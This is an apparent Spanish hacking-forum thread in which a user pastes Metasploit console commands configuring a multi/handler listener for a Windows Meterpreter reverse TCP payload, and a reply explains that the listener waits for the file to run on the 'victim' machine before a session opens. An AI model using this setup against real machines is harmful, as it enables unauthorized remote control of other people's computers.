Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: j0x1_zurc en 1 Septiembre 2017, 04:51 AM

Título: Porque termina el proceso de escucha en metasploit?
Publicado por: j0x1_zurc en 1 Septiembre 2017, 04:51 AM
El problema es que cuando termino de configurar la consola de metasploit para hacer un ataque en windows, termina el proceso de escuccha, y queda algo como esto:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options

Module options (exploit/multi/handler):

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
  LHOST     192.168.1.3      yes       The listen address
  LPORT     443              yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Wildcard Target


msf exploit(handler) > exploit
Título: Re: Porque termina el proceso de escucha en metasploit?
Publicado por: lilux en 28 Septiembre 2017, 13:29 PM
No te preocupes, no es un problema. Eso significa que se queda a la espera de que suceda se ejecute el archivo en la máquina víctima. Una vez que se ejecute el archivo en la máquina víctima, verás como en la máquina atacante muestra una sesión abierta. Tras eso, solo tendrías que acceder a la sesión activa con session -i "n" donde n sería el id de la sesión.